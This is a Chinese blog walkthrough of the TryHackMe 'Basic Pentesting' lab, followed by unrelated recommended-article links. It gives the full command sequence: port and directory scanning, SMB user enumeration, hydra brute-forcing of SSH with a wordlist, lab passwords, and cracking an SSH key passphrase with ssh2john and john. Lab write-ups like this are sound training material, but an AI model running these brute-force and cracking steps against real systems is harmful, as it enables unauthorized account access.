来自tryhackme的 Basic Pentesting

开靶场IP:10.10.227.255

# nmap 端口扫描

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7

# gobuster 目录扫描

/.hta (Status: 403)

/.htaccess (Status: 403)

/.htpasswd (Status: 403)

/development (Status: 301)

/index.html (Status: 200)

/server-status (Status: 403)

在/development发现

#

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat

to host that on this server too. Haven't made any real web apps yet, but I have tried that example

you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm

using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

#

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,

and I was able to crack your hash really easily. You know our password policy, so please follow

it? Change that password ASAP.

-K

根据提示工具 使用 SMB 查找用户名怎么样?

/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

得到用户名jan

使用hydra爆破ssh密码

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh

......等了很久大概有十分钟的样子

passwd:armando

按照提示使用LinEnum找到到登录的ssh

https://github.com/rebootuser/LinEnum(开箱即用)

/home/kay/.ssh/id_rsa

使用

ssh2john rsa_a.id_rsa >id_rsa_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

破解密码为

beeswax(很快)

登录

ssh -i id_rsa kay@10.10.227.255

即可

Basic Pentesting的更多相关文章

  1. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  2. Atitit HTTP 认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结

    Atitit HTTP认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结 1.1. 最广泛使用的是基本验证 ( ...

  3. Basic Tutorials of Redis(9) -First Edition RedisHelper

    After learning the basic opreation of Redis,we should take some time to summarize the usage. And I w ...

  4. Basic Tutorials of Redis(8) -Transaction

    Data play an important part in our project,how can we ensure correctness of the data and prevent the ...

  5. Basic Tutorials of Redis(7) -Publish and Subscribe

    This post is mainly about the publishment and subscription in Redis.I think you may subscribe some o ...

  6. Basic Tutorials of Redis(6) - List

    Redis's List is different from C#'s List,but similar with C#'s LinkedList.Sometimes I confuse with t ...

  7. Basic Tutorials of Redis(5) - Sorted Set

    The last post is mainly about the unsorted set,in this post I will show you the sorted set playing a ...

  8. Basic Tutorials of Redis(4) -Set

    This post will introduce you to some usages of Set in Redis.The Set is a unordered set,it means that ...

  9. Basic Tutorials of Redis(3) -Hash

    When you first saw the name of Hash,what do you think?HashSet,HashTable or other data structs of C#? ...

  10. Basic Tutorials of Redis(2) - String

    This post is mainly about how to use the commands to handle the Strings of Redis.And I will show you ...

随机推荐

  1. Flink 1.0 ProgramInvocationException: Job failed ConnectException: 拒绝连接 (Connection refused)

    [问题描述]:[root@hadoop1 flink-1.10.1]# bin/flink run examples/streaming/SocketWindowWordCount.jar  --po ...

  2. 可靠消息最终一致性【本地消息表、RocketMQ 事务消息方案】

    更多内容,前往IT-BLOG 一.可靠消息最终一致性事务概述 可靠消息最终一致性方案是指当事务发起方执行完成本地事务后并发出一条消息,事务参与方(消息消费者)一定能够接收消息并处理事务成功,此方案强调 ...

  3. call、apply 及 bind 函数

    首先从以下几点来考虑如何实现这几个函数 不传入第一个参数,那么上下文默认为 window: 改变了 this 指向,让新的对象可以执行该函数,并能接受参数. 实现call 首先 context 为可选 ...

  4. python语法的入门

    1.变量 1.1: 底层原理:现在内存空间申请一块地址来储存变量值, 然后把申请的内存地址跟变量名绑定在一起 之后只需通过访问变量名就可以获取变量值 1.2:一个变量名只能指向一个内存地址,但是一个内 ...

  5. jmeter参数化导致反斜杠(\)被转义

    前情提要:在用jmeter做接口测试时,对请求体进行参数化,执行结果报错.但在不参数化的情况下,执行结果成功,而且参数化后,请求中读取到的参数是正确的(执行失败与执行成功时的参数一致). 问题排查:参 ...

  6. 从 1 秒到 10 毫秒!在 APISIX 中减少 Prometheus 请求阻塞

    本文介绍了 Prometheus 插件造成长尾请求现象的原因,以及如何解决这个问题. 作者屠正松,Apache APISIX PMC Member. 原文链接 现象 在 APISIX 社区中,曾有部分 ...

  7. ROS动态调试PID参数

    ROS动态调试PID参数 连接小车 注意:必须在同一区域网 ssh clbrobort@clbrobort 激活树莓派主板 roslaunch clbrobot bringup.launch 打开PI ...

  8. 一个可用于生产项目 基于 .NET 6 自研ORM

    Fast Framework 作者 Mr-zhong 代码改变世界.... 一.前言 Fast Framework 基于NET6.0 封装的轻量级 ORM 框架 支持多种数据库 SqlServer O ...

  9. extend笔记

    JavaScript面向对象 继承extend 1. 概念(主要用途) 将子类中的共性代码 ( 属性和方法 ) 抽取出来 放到父类中 每当有一个新的子类需要用到共性的属性或者方法时 不需要在自己内容复 ...

  10. day06-优惠券秒杀02

    功能03-优惠券秒杀02 4.功能03-优惠券秒杀 4.4一人一单 4.4.1需求分析 要求:修改秒杀业务,要求同一个优惠券,一个用户只能下一单. 在之前的做法中,加入一个对用户id和优惠券id的判断 ...